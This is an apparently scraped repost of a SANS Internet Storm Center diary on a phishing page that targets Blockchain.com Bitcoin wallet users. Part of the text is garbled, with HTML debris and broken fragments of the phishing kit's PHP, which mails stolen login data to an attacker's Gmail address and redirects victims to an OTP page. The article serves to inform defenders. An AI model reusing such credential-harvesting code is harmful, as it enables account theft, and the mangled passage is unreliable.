Concerned About Your Business Cyber Security?

(877) 321--7374

Phishing Campaigns Follow Trends, (Fri, Jun 2nd)

Those phishing emails that we receive every day in our mailboxes are often related to key players in different fields:

Internet actors Google, Yahoo!, Facebook, …
Software or manufacturers Apple, Microsoft, Adobe, …
Financial Services Paypal, BoA, name your preferred bank, …
Services DHL, eBay, …

But the landscape of online services is ever changing and new actors (and more precisely their customers) become new interesting targets. Yesterday, while hunting, I found for the first time aphishing page trying to lure the Bitcoinoperator: BlockChain. Blockchain[1] is a key player in the management of width:600px” />

Hopefully, the webshellisn padding:5px 10px”>
$from = From: b hacker@forever.orgn
$from .= MIME-Version: 1.0rn
$from .= charset=ISO-8859-1rn
if(@$_GET[accedi]==login){
mail(carlosromero19871@gmail.com
header( Location: richiesta_otp.html
}else{

Note that the login procedure on BlockChain is extremely strong: 2FA authentication and one-time link is sent via email to approve all login attempts. Be sure that activate them if youre a BlockChain customer.

The fact that Bitcoins, the digital currency, is getting more and more popular makes it a new interesting target for attackers. And this is also the case in corporate environments: There is a trend in companies that make a reserve of Bitcoins to prevent possible Ransomware attacks![3]

[1] https://www.blockchain.com
[2]http://klimatika.com.ua/block/
[3]https://www.technologyreview.com/s/601643/companies-are-stockpiling-bitcoin-to-pay-off-cybercriminals/

Xavier Mertens (@xme)
ISC Handler – Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Ready For ASuperheroI.T. Solution?

Real Time Web Analytics